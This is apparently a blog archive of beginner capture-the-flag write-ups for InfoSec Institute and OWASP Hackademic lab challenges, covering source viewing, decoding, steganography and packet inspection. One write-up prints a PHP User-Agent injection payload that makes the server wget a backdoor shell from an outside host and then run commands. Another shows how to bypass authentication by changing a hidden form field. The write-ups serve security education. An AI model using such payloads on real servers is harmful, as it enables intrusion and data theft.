Tag: infosec

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #8

thefluffy007

Another day, another challenge…

Today’s challenge will be on CTF Challenge #8 from InfoSec Institute.

Going to the following link

We see the following page.

infosec_8_intro

We’re introduced with the downloading a file.

Doing our trick of right click, view page source we see the following:

infosec_8_pagesource

We see the file that we need to download called “app.exe”

Downloading and opening the file we noticed that the application is the netstat command listing our network information.

Since our tricks does not work, we need to find a way to view the source of the application.

One option is to use the linux strings command.

The strings command allows you to find English words in file.

If you are working on a Windows machine (like I am) you can download the cygwin emulator which allows you to do simple Linux commands on a Windows machine.

To download cygwin go here.

Note: Make sure when downloading that you add the binutils package to import the strings command.

Copy the app.exe file into the cygwin directory (that you specified in your installation) so you navigate to that file.

After downloading cygwin, and using the strings command we see the following:

infosec_8_flag

We found the flag – infosec_flagis_0x1a!

Lessons learned:

Again, our normal tricks of viewing the page source did not work. We noticed that when we executed the program that it was the netstat command getting information on our network. From there we decided that we would need to see the source of the application to see if the flag was hidden in there. Turns out it was. Overall lesson, be flexible with your tool belt and think outside of the box!

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #7

thefluffy007

Another day, another challenge…

Today’s challenge will be exploring InfoSec Institute CTF Challenge #7.

Going to the following link we’re presented with the following:

infosec_7_beginning

Doing a right click we see the following:

infosec_7_pagesource

Hmm… this doesn’t provide us with any information.

Going to the developer tools (F12) we see the following:

infosec_7_developertools

Still not giving us a lot of information.

Next – we’re going to use Zap to spider the site to see if we can get anymore information.

To configure ZAP, review the following link HERE.

Spidering the site we’re still not seeing a lot of information…

infosec_7_zapproxy

Looking at the other pages of the challenge we notice that it is “level<number>” Let’s try to change from the 404.php to levelseven.php, and see what we get.

Changing the site we see a blank page:

infosec_7_levelseven

Going back to ZAP we see the following:

infosec_7_levelseven_ZAP

Looking at the response we notice that the levelseven.php returns a 200 “OK” status. Next to the status we see weird encoding. Looking at the end of the encoding it ends in “==”. Could this be base 64 encoding, let’s try it.

Going to Google, and typing in “base 64 decoder” we get the following link.

Putting in our encoding we get the following:
infosec_7_flagfound

We found the flag – infosec_flagis_youfoundit!

Lessons learned:

Don’t depend on one solution. You should have multiple tools in your tool belt! We tried the view page source, but that didn’t work. Looking at the network traffic inside the developer tools did not help either. When all else fails, we can use a proxy. After configuring the proxy we still noticed that we didn’t see anything. When we realized that the page did not follow the pattern of the other pages in the ctf challenge we decided to go to the real level seven page. Once we did this (with our intercepting proxy on) we noticed that we received a valid response with special 64 encoding. Decoding this, we were presented with the flag! The developer tried to do security through obscurity by presenting us with a red herring in the 404.php page. Security through obscurity doesn’t work as we found out the pattern of the challenge and was able to solve the challenge.

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #6

thefluffy007

Another day,. another challenge…

Today’s challenge will be on the InfoSec Institute CTF Challenge #6.

See scenario below:

infosec_6_intro

Doing a page source we see the following:

infosec_6_pagesource

We see that there’s a pcap file if we select yes.

Opening Wireshark (which can be downloaded HERE)

We see the following:

infosec_6_wireshark

Wireshark is a program that is used to analyze network traffic. Most of the traffic in this file can be ignored as there is a lot of noise that is being displayed.

Looking at the first packet (UDP) we see the following:

infosec_6_udp_packet

We noticed there are a bunch of letters… possibly this is hexadecimal encoding?

Going to Google and searching for “hexadecimal decoding” we see the following link as the first result.

Clicking on the link and typing in the encoding we get the following:

infosec_6_finished

 

We found the flag!

Lessons learned:

  1. Download Wireshark!
  2. Inspect the packets, and pay attention to those that stand out. Usually the suspicious packets hold clues!
  3. These clues won’t give us the pot of gold on the first try. Most of the data will be obscured. So we will need to encode or decode the data
  4. Once we encode or decode usually the data will be there!

FYI – thenewboston on Youtube has a good beginner tutorial on Wireshark. Which can be found HERE.

capture the flag, hacking, web application security

OWASP Hackademic Challenge 9

thefluffy007

Another day, another challenge.

Today’s post will be on the ninth challenge from the OWASP Hackademic Challenge.

Below is the scenario:

A friend of yours has set up a news blog at slagoff.com. However, he is kind of worried regarding the security of the news that gets posted on the blog and has asked you to check how secure it is.

Your objective is to determine whether any vulnerabilities exist that, if exploited, can grant access to the blog’s server.

Hint: A specially-tailored backdoor shell can be found at “http://www.really_nasty_hacker.com/shell.txt“.

Below is the solution

Clicking the first link we are presented with the following screen:

challenge9intro

Doing a right click, view page source we get the following:

challenge9pagesource

We noticed there’s a hidden field with the value of answer.php, with a name of page. Hmm… let’s see if we can access this page.

Putting the following address in the URL bar it seems we cannot access the file.

challenge9answerphpnotfound

From the description we know that we need to upload a file from http://www.really_nasty_hacker.com/shell.txt

We know that our page is using php. Let’s see if we can modify the User-Agent using php syntax.

Opening Tamper Data after we enter the comment we’re presented with the following:

challenge9tamperdatapart2

Changing the User-Agent to:

<?system(“wget http://www.really_nasty_hacker.com/shell.txt&#8221;);?>

Pressing “OK” we get the following:

challenge9successful

Our script was uploaded successfully!

Going to the new site we see the following:

challenge9commandline

Hmm… We’re presented with a command line similar to challenge 8!

Let’s do a ls to see what we have on the file system.

challenge9lsoutput

Well we see that there is a file named “sUpErDuPErL33T.txt”

Let’s see what’s in this file.

challenge9logininfo

We’re presented with login information.

Looking back at the command file we see the following file adminpanel.php

Going to that file we see the following:

challenge9adminportalphp

An admin portal!

Let’s enter our login information and see what we get:

challenge9adminportallogin

challenge9congrats

We passed the challenge!!!

Lessons learned:

We did our right click view page source which showed that we had a hidden file named answer.php. Trying to access this file didn’t help us. Next changing the user agent we were able to upload our file to the file system. Going to the file on the file system we noticed that the file allows us to execute commands. Executing the commands were able to find the login information and login successfully.

Use the knowledge you’ve learned to solve the next challenge. We were first introduced to user-agents in challenge #5 with the p0wnbrowser product. We know that we can change the user-agent to show content that we would’ve never noticed.

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #5

thefluffy007

Another day, another challenge…

Today’s challenge is #5 from the InfoSec Institute CTF Challenge.

Clicking on the following link we’re presented with the following:

infosec_5_intro

After clicking on the checkbox to prevent the page from displaying additional dialogs, and adding “view-source:” to the URL box we see the following:

infosec_5_pagesource

When viewing the page source further the reason we were getting multiple alert boxes was that it was inside of an infinite for loop. Read more about for loops HERE.

Looking inside the for loop we see that there is a image field titled “aliens”. Clicking on the file we see the following:

infosec_5_aliens_gif

At first when I read the meme I was at a loss, as I have never seen or heard this quote before. After doing some digging online, it hit me. What if there’s another secret meaning to this message?

How does one add a secret inside of an image? Steganography.

Saving the image, and doing a quick Google search of Steganography decoder online we’re presented with this site.

Uploading our file, and pressing decode we get the following:

infosec_5_decode

Binary. OK… this doesn’t seem helpful, or is it?

Doing another Google search to decode binary to ASCII we’re presented with this link.

Entering our binary code, we get the following:

infosec_5_end

We found the flag!

Lessons learned:

  1. Don’t be deterred by the multiple alert boxes!
  2. Using our trick of adding “view-source:” to the beginning of the URL
  3. Reviewing the page source we noticed a file
  4. Opening file we noticed it was a meme
  5. Researching what meme meant
  6. After finding meaning using tools to extract data that we needed
  7. Not being deterred that the extracted data was not in our preferred format (words not binary)
  8. Used Google to research how we could get extracted data into preferred format (words not binary)
  9. Finally, finding our flag
capture the flag, hacking, web application security

InfoSec Institute CTF Challenge 3

thefluffy007

Another day, another challenge…

Today’s challenge will be #3 from the InfoSec Institute.

Going to the following link we’re presented with the following:

infosec_3_intro

Looking at the screen we’re presented with a qr code.

Doing a right click, view source we see the following:

infosec_3_pagesource

Doing a quick Google search of “QR code decoder” we go to the following site.

Entering the proper information and uploading our file we see the following:

infosec_3_morsecode

Doing a Google search of our output the code is actually Morse code!

Another Google search to decode the code gives us the following site.

Putting our code inside of the decoder we get the following:

infosec_3_finalresult

We found the flag!!!

Lesson learned:

Right click, view page source saves the day again. By doing this we found that there is a qrcode being displayed on the page. Doing a quick Google search we found a QR code decoder that gave us morse code. Another Google search yielded the flag.

When in doubt view page source and Google searches!

capture the flag, hacking, web application security

InfoSec Institute CTF Challenge #4

thefluffy007

Another day, another challenge…

Today’s challenge is #4 from the InfoSec Institute CTF challenge.

Going to the following link we see the following:

infosec_4_intro

Doing a right click view page source we see the following:

infosec_4_pagesource

Looking at the page we see the following hint – “Hypertext Transmission Protocol”

Pressing F12 to view the developer tools and going to the “Network” tab we see the following:

infosec_4_cookie

Inside the set-cookie we see “fusrodah=vasbfrp_syntvf_jrybirpbbxvrf”. This is interesting…

Doing a quick Google search and putting in the second half of our value we get the following link for ROT-13.

ROT-13 is a rotation 13 cipher. This cipher rotates each character by 13 characters.

Using the following site, and putting in our value we get:

infosec_4_final

We retrieved the flag.

Lessons learned:

Use the hints provided. We our trust right click, view page source, but that didn’t help us. Going back to the page we noticed that the hint was HTTP. Using the development tools inside Chrome and going to the network tab we saw the files retrieved when accessing the site.

Clicking on the page, and viewing the headers we noticed that the cookie was being set. Using this information inside Google we were able to decode the message.

capture the flag, hacking, web application security

InfoSec Institute Capture The Flag #2

thefluffy007

Another day, another challenge.

Today’s challenge will be on the second ctf challenge from the InfoSec Institute.

Below is the screen listed HERE when accessing the link:

infosec_2

Doing a right click view page source and scrolling down we see the following:

infosec_2_pagesource

We see a img src that points to a leveltwo.jpeg. Clicking the file we get the following:

infosec_2_imgsrc

Going to the space bar and add the “view-source:” to the beginning of the address bar we get the following:

infosec_2_flag

We got the flag!

Lesson learned:

Once again do the right click page source. In the beginning it didn’t reveal too much except that there was an image. Clicking on said image we’re brought to a page with a non-rendered image. Viewing the source of that image we see the flag. This is security through obscurity which never works.

capture the flag, hacking, web application security

Infosec Institute – Capture the Flag #1

thefluffy007

Another day, another challenge…

Today’s challenge is the first from the Infosec Institute. The website can be found HERE.

Clicking on the levels selecting the first challenge we see the following:

infosec_1

Doing a right click on page source we see the flag at the top of the page.

infosec_1_pagesource

Lesson learned:

When in doubt, do a right click and view page source. By doing this it will reveal a lot of goodies about a website.

hacking, owasp, web application security

OWASP Hackademic Challenge 10

thefluffy007

Another day, another challenge…

Today’s challenge will conclude the Hackademic Challenge.

Below is the scenario:

Would you like to become an active hacker ?
How about becoming a member of the world’s largest hacker group:
The n1nJ4.n4x0rZ.CreW!

Before you can join though, you ‘ll have to prove yourself worthy by passing the test that can be found at: http://n1nj4h4x0rzcr3w.com

If you succeed in completing the challenge, you will get a serial number, which you will use for obtaining the password that will enable you to join the group.

Your objective is to bypass the authentication mechanism, find the serial number and be supplied with your own username and password from the admin team of the site.

Clicking the link we see the following screen:

challenge10intro

Doing a right click, page source we see the following:

challenge10pagesource

Looking at the line above the password line we noticed that there is a hidden field called “LetMeIn” which is set to false. What if we set this to true?

Going back to the our original screen, and clicking on Tools –> Web Developer Extension –> Forms –> Display Form Fields we see the following screen:

challenge10formfields

Changing the field from “False” to “True” and pressing the “Login” button we see the following:

challenge10encoding

Hmm… there’s an alert box that has encoding in it. Could this encoding contain the serial number?

Copying the encoding and going to Google we search for “Decoder online”. We found a website HERE

Changing the encoding type from Base64 to URL encoding and pressing “Decode” we see the following:

challenge10serialnumber

We have the serial number!

Going back to the challenge and pressing Enter we’re presented with the following screen:

challenge10email

Entering our name and serial number, and pressing the send button we see the following screen:

challenge10congrats

Lesson learned:

Our trick of right clicking and viewing the page source helped us. We noticed that there is a hidden field titled, “LetMeIn”. Developers believe that just because a field is hidden a penetration tester could not exploit these fields. This is further from the truth.

After we have tampered with the hidden field we are next encountered with encoding. Doing a quick Google search we found an encoder/decoder online that we can use to decode the encoding.

Once that decoding is done we entered our name and serial number on the next screen and we have completed the challenge.